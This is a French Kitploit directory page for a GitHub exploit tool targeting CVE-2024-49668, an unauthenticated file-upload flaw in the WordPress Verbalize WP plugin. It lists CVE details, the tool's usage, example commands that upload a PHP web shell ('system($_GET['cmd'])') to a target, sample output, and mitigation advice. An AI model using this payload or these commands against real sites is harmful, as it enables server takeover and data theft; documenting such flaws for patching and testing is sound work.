Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-49668 — Plugin WordPress Verbalize WP <= 1.0 - Vulnérabilité de téléchargement de fichier arbitraire | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-49668
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-49668

CVE-2024-49668

Plugin WordPress Verbalize WP <= 1.0 - Vulnérabilité de téléchargement de fichier arbitraire

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2024-49668 : Vulnérabilité de téléchargement arbitraire de fichiers dans le plugin WordPress Verbalize WP

📋 Aperçu

CVE-2024-49668 est une vulnérabilité critique dans le plugin WordPress Verbalize WP versions 1.0 et inférieures. Cette vulnérabilité permet à des attaquants non authentifiés de télécharger des fichiers arbitraires, y compris des shells web, sur le serveur web. Le problème provient d'une validation insuffisante des entrées et des restrictions de type de fichier lors du téléchargement de fichiers.

Détails

  • Publié : 2024-10-23
  • Mis à jour : 2024-10-23
  • Titre : Plugin WordPress Verbalize WP <= 1.0 - Vulnérabilité de téléchargement arbitraire de fichiers
  • Description : Vulnérabilité de téléchargement sans restriction de fichiers de type dangereux dans Admin Verbalize WP Télécharger un shell web sur un serveur web. Ce problème affecte Verbalize WP de n/a à 1.0.
  • CWE : CWE-434 : Téléchargement sans restriction de fichier de type dangereux
  • Score CVSS : 10,0 (Critique)
  • Chaîne vectorielle : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ Script d'exploitation

Ce script Python exploite la vulnérabilité CVE-2024-49668 pour télécharger un fichier shell sur le site WordPress cible en utilisant le plugin Verbalize WP.

Fonctionnalités

  • Vérification automatisée de la vulnérabilité : Le script vérifie si le site cible est vulnérable en lisant la version du plugin dans readme.txt.
  • Téléchargement de fichier : Télécharge un fichier PHP shell sur le site cible.
  • Extraction du chemin : Extrait et affiche le chemin complet du fichier shell téléchargé.

🧰 Prérequis

  • Python 3.x
  • Bibliothèque requests

Installez la bibliothèque requise avec pip :

root@kitploit:~
pip install requests

🚀 Utilisation

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

Exécute une requête POST vers un site WordPress.

options:
  -h, --help         affiche ce message d'aide et quitte
  -u, --url URL      URL cible
  -s, --shell SHELL  Code shell à télécharger

Exemple

Par défaut, le script télécharge un shell PHP qui exécute phpinfo().

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

Vous pouvez également spécifier un code PHP shell personnalisé à télécharger :

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 Sortie du script

root@kitploit:~
Le site est vulnérable. Exploitation de la version : 1.0. Téléchargement du fichier en cours...
Chemin du shell : /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By : Nxploit, Khaled ALenazi

📚 Informations complémentaires

Impact de la vulnérabilité

La vulnérabilité CVE-2024-49668 permet aux attaquants de prendre le contrôle total du serveur cible en téléchargeant des fichiers malveillants. L'exploitation de cette vulnérabilité peut entraîner de graves conséquences, notamment des violations de données, un accès non autorisé et une éventuelle défiguration du site web.

Bonnes pratiques d'atténuation

Pour protéger votre site WordPress contre cette vulnérabilité, il est recommandé de :

  • Mettre à jour le plugin Verbalize WP vers la dernière version qui corrige ce problème.
  • Mettre en place des validations strictes des téléchargements de fichiers pour limiter les types et tailles de fichiers.
  • Surveiller régulièrement les journaux du serveur pour détecter toute activité suspecte.

Avertissement légal

Cet outil est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de cet outil contre des sites web sans l'autorisation explicite du propriétaire est illégale. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil.


Créé le 22 mars 2025 par Nxploited , Khaled alenazi

Télécharger l’outil